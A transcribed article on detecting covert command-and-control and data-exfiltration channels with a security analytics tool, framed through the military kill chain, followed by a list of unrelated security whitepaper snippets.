Transcription

1 Covert Operations: Kill Chain Actions using Security Analytics Written by Aman Diwakar Twitter: LinkedIn: In Special Operations, there are multiple actors on either side of the battlefield, at anypoint in time, attempting to achieve tactical leverage over the enemy. This leverage comes in multiple forms, at different stages of combat and the entire process is referred to as the Kill Chain. The kill chain in special operations includes reconaissance, weaponization, payload delivery, exploitation, establishment of communication from behind the enemy lines and ultimately completion of the mission and successful exfiltration. As an Intelligence Analyst in the military, I was intimately familiar with this process and how successful actions on target, in rapid, deliberate succession would mean victory for the unit best able to execute and defeat for the opposition forces. This article will highlight how using security intelligence, you, the Network Operator can gain tactical leverage, interrupt the kill chain and successfully defend your area of responsibility against the threat actor or agressor. Your goal will be to remain eternally vigilant, it is the price we pay for security, whether in the cyber world, or physical. In order to prepare to defend your network, you need to gather all the information and intelligence you possibly can because those aiming to exploit it will be very well prepared, most of the time, better prepared than you because it is they who will be choosing the time and place. Because compiling and discussing all the possible permutations of data points is outside of the scope of this article, we will speak of the two more important pieces of information that you will need to acquire. The first will be logging and activity data from the infrastructure, the second will be packet data from network taps at strategic chokepoints in the network. You will finally need to be able to take these two pieces of network intelligence and correlate them quickly and effectively being that this information will likely be unstructured and disparate. The only commonality here will be the fact that when correctly and intelligently manipulated, this data will yield the information that is required to be able to make tactical decisions that will pave way for successful defense.

2 Once the above preparations are successfully executed, the majority of the time spent should be in indentifying and monitoring the network for malicious activity. The determined adversary will first attempt to gain intelligence on the target, your role will be to take that opportunity to gather counterintelligence. This counteritelligence will be critical in identifying the specific threat from the sea of adversaries that your network faces on a daily basis, however, it is an extremely challenging objective as the advanced threat actor will be attempting to thwart counterintelligence activities. Information regarding the potential attacker can often be ascertained from coding in malware that can reference a language or country of origin, the attackers modus operandi (based on historical data) or ways in which commonly used tools are customized. Because the attacker is constantly seeking to avoid detection or mislead you, any one of the above mentioned telltale signs can easily be spoofed, thus it is best to take into account all possible activities holistically when attempting identification. Security analytics tools that consume network telemetry data and deduce possible suspicious or malicious traffic are instrumental in the identification phase as well as in the containment of such activities on the network. In the rest of this article, we will be utilizing information attained from RSA s Security Analytics to demonstrate the identification of malicious activity on the network that manifests itself in traffic that hides itself in benign HTTP or IRC traffic. This type of network evasion is generally referred to as covert channels as the attacker attempts to hide C2 (Command and Control) and data exfiltration traffic as well as subvert traditional security controls such as IPS/IDS Signature- based mechanisms and additionally, firewall filters. Security Analytics is designed to track and identify those threats on the network that are not identified in the wild using traditional detection methods because the attacker is exploiting an as- of- yet unidentified vulnerability in the infrastructures components. There are two methods of searching for suspicious activity, both methods are checking for data leaks, potentially unauthorized file transfers as well as C2 activity. The first method searches for traffic to suspicious countries, files that were sent outside the US by systems that should not be engaging in this behavior, the second method searches file transfer and IRC communication traffic over non- standard port. In the snapshot illustrated above, SA has identified potential data exfiltration acitivity by correlating different pieces of network data together such as IP- by- country and packet capture that confirms a data channel.

3 One common method of obfuscating a file transfer is by tunneling ftp traffic over non- standard ports. This method is commonly referred to as a covert- channel, however, it is not limited to just ftp traffic. Covert channel is a method by which packet data is transmitted through ports over which they would generally not travel as is common in many P2P applications. The concern with this type of traffic is that it is a common vector for C2 communications as C2 traffic is commonly sent over IRC. As we follow a suspected file transfer, we re able to simply click the suspicious activity and identify the destination country that the file was sent to, in this case, Uzbekistan. Off course, many organizations do business with Uzbekistan and it is totally plausible that this is legitimate traffic in those organizations, however, in this case, we did not and as such, tagged this as a suspicious activity. The screen below identifies the file transfer, including username/password, ports and the file name that was transmitted. This activity will now trigger and investigation and determination as to why this took place and if there is any need for further action.

4 The illustration below demonstrates an IRC based covert channel activity, the IRC traffic is attempting to hide in a non- standard port, upon inspection of which, it is discovered that the exchange has attempted to download and execute malicious code. This code could be the basis of a botnet C2 establishment or installation of other virus or malware. One might think that a hardened operation system along with good Antivirus protection would mitigate this type of an attack or activity, however, with remote command shell exploitation and zero day threats, these attacks commonly bypass antivirus and antimalware filters and detection engines. Now the attacker can pivot to an escalation of privilege attack and get this host to either participate in malicious activity or simply is the destination system the hacker was attempting to infiltrate. The last example below is a capture of another service, Gnutella, as it was being utilized to download a Flash installation from Macromedia/Adobe s website. This is a perfect example of a P2P site that tunnels traffic over HTTP, but because the HTTP header information is suspicious (low header count), this traffic is flagged by SA for an administrator to further review. Here, Gnutella triggered a get HTTP command and we are able to dissect the event

5 and reconstruct it per preceding screenshots and packet samples. The packet capture indicates that the session initiated to get an updated of Flash Player.

6

7 The figure above is a live packet capture event reconstruction as it indicates Gnutella traffic over port 80 during a GET http command execution from host fpdownload2.macromedia.com of Flash. To summarize, C2 and malicious traffic evasion tactics are evolving, as malicious actors attempt to stay ahead of the malware research community. Malware is becoming more difficult to analyze as writers prevent execution of the malicious code in a sandbox if the code detects a human is not executing it via mouse or keyboard commands or if the process is not executing on a human interfacing system, i.e a user PC or server. Furthermore, such activity hides behind encrypted, covert channels to take it up another notch. The adversary will become more sophisticated and determined as the motivation for such actions continue to be either financial or political edge, placing you, on the front lines of a full- fledged cyber warfare.

DRIVE-BY DOWNLOAD WHAT IS DRIVE-BY DOWNLOAD? Drive-by Downloads are a common technique used by attackers to silently install malware on a victim s computer. Once a target website has been weaponized with

DYNAMIC DNS: DATA EXFILTRATION RSA Visibility Reconnaissance Weaponization Delivery Exploitation Installation C2 Action WHAT IS DATA EXFILTRATION? One of the most common goals of malicious actors is to

The Advanced Attack Challenge Creating a Government Private Threat Intelligence Cloud The Advanced Attack Challenge One of the most prominent and advanced threats to government networks is advanced delivery

Malicious Network Traffic Analysis Uncover system intrusions by identifying malicious network activity. There are a tremendous amount of network based attacks to be aware of on the internet today and the

Trends in Malware DRAFT OUTLINE Presentation Synopsis Security is often a game of cat and mouse as security professionals and attackers each vie to stay one step ahead of the other. In this race for dominance,

Course: Malicious Network Traffic Analysis Duration: 5 Day Hands-On Lab & Lecture Course Price: $ 3,495.00 Description: There are a tremendous amount of network based attacks to be aware of on the internet

White Paper Spear Phishing Attacks Why They are Successful and How to Stop Them Combating the Attack of Choice for Cybercriminals White Paper Contents Executive Summary 3 Introduction: The Rise of Spear

A New Approach to Assessing Advanced Threat Solutions December 4, 2014 A New Approach to Assessing Advanced Threat Solutions How Well Does Your Advanced Threat Solution Work? The cyber threats facing enterprises

WHITE PAPER SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM Why Automated Analysis Tools are not Created Equal SECURITY REIMAGINED CONTENTS Executive Summary...3 Introduction: The Rise

Whitepaper A New Perspective on Protecting Critical Networks from Attack: Why the DoD Uses Advanced Network-traffic Analytics to Secure its Network 2014: A Year of Mega Breaches A Ponemon Study published

The Federal CISO Dilemma You have to do FISMA. You must defend against cyber threats. October 2012 Executive Summary Federal CISOs face a unique cyber security challenge copious amounts of regulatory compliance

TRITON AP-EMAIL Stop advanced targeted attacks, identify high risk users and control Insider Threats From socially engineered lures to targeted phishing, most large cyberattacks begin with email. As these

White Paper Content Security: Protect Your Network with Five Must-Haves What You Will Learn The continually evolving threat landscape is what makes the discovery of threats more relevant than defense as

Practical Threat Intelligence with Bromium LAVA Practical Threat Intelligence Executive Summary Threat intelligence today is costly and time consuming and does not always result in a reduction of successful

WHITEPAPER How a DNS Firewall Helps in the Battle against Advanced Persistent Threat and Similar Malware How a DNS Firewall Helps in the Battle against Advanced As more and more information becomes available

DATA SHEET What Darktrace Finds Darktrace finds anomalies that bypass other security tools, due to the uniqueness of the Enterprise Immune System, capable of detecting threats without reliance on rules,

ESG Brief Addressing APTs and Modern Malware with Security Intelligence Date: September 2013 Author: Jon Oltsik, Senior Principal Analyst Abstract: APTs first came on the scene in 2010, creating a wave

Topic 3: Lesson 2 Intro to Firewalls Summary Basic questions What is a firewall? What can a firewall do? What is packet filtering? What is proxying? What is stateful packet filtering? Compare network layer

defending against advanced persistent threats: strategies for a new era of attacks agility made possible security threats as we know them are changing The traditional dangers IT security teams have been

Unknown threats in Sweden Study publication August 27, 2014 Executive summary To many international organisations today, cyber attacks are no longer a matter of if but when. Recent cyber breaches at large

White Paper Cisco Advanced Malware Protection Sandboxing Capabilities What You Will Learn How sandboxing is a key part of network security when it operates as an integrated component of a complete solution.

A Cloud Security Primer : WHAT ARE YOU OVERLOOKING? LEGAL DISCLAIMER The information provided herein is for general information and educational purposes only. It is not intended and should not be construed

Rethinking Information Security for Advanced Threats CEB Information Risk Leadership Council Advanced threats differ from conventional security threats along many dimensions, making them much more difficult

How Lastline Has Better Breach Detection Capabilities By David Strom December 2014 david@strom.com The Internet is a nasty place, and getting nastier. Current breach detection products using traditional

SPEAR PHISHING AN ENTRY POINT FOR APTS threattracksecurity.com 2015 ThreatTrack, Inc. All rights reserved worldwide. INTRODUCTION A number of industry and vendor studies support the fact that spear phishing

On-Premises DDoS Mitigation for the Enterprise FIRST LINE OF DEFENSE Pocket Guide The Challenge There is no doubt that cyber-attacks are growing in complexity and sophistication. As a result, a need has

RSA Security Analytics This is what SIEM was Meant to Be 1 The Original Intent of SIEM Single compliance & security interface Compliance yes, but security? Analyze & prioritize alerts across various sources

Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities Protecting a business s IT infrastructure is complex. Take, for example, a retailer operating a standard multi-tier infrastructure

Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology

White Paper Addressing the Full Attack Continuum: Before, During, and After an Attack It s Time for a New Security Model Today s threat landscape is nothing like that of just 10 years ago. Simple attacks

Architecture The policy discussed suggests that the network be partitioned into several parts with guards between the various parts to prevent information from leaking from one part to another. One part

Firewall Cracking and Security By: Lukasz Majowicz Dr. Stefan Robila 12/15/08 What is a firewall? Firewalls are programs that were designed to protect computers from unwanted attacks and intrusions. Wikipedia

Reverse Shells Enable Attackers To Operate From Your Network Richard Hammer August 2006 Reverse Shells? Why should you care about reverse shells? How do reverse shells work? How do reverse shells get installed

Firewalls and Software Updates License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. Contents General

Cyber Watch Written by Peter Buxbaum Security is a challenge for every agency, said Stanley Tyliszczak, vice president for technology integration at General Dynamics Information Technology. There needs

Intrusion Detection System Time Machine Dynamic Application Detection 1 NIDS: two generic problems Attack identified But what happened in the past??? Application identification Only by port number! Yet

Introduction of Intrusion Detection Systems Why IDS? Inspects all inbound and outbound network activity and identifies a network or system attack from someone attempting to compromise a system. Detection:

Firewalls and Intrusion Detection What is a Firewall? A computer system between the internal network and the rest of the Internet A single computer or a set of computers that cooperate to perform the firewall

BROCHURE The Value of QRadar QFlow and QRadar VFlow for Security Intelligence As the security threats facing organizations have grown exponentially, the need for greater visibility into network activity

2010 White Paper Series Layer 7 Application Firewalls Introduction The firewall, the first line of defense in many network security plans, has existed for decades. The purpose of the firewall is straightforward;

Fighting Advanced Persistent Threats (APT) with Open Source Tools What is APT? The US Air Force invented the term in 2006 APT refers to advanced techniques used to gain access to an intelligence objective

TrendLabs When attackers have reached this stage, it is not a big issue for them to transfer data out. Spencer Hsieh Trend Micro threat researcher Advanced persistent threats (APTs) refer to a category

HOW TO PREVENT DDOS ATTACKS IN A SERVICE PROVIDER ENVIRONMENT The frequency and sophistication of Distributed Denial of Service attacks (DDoS) on the Internet are rapidly increasing. Most of the earliest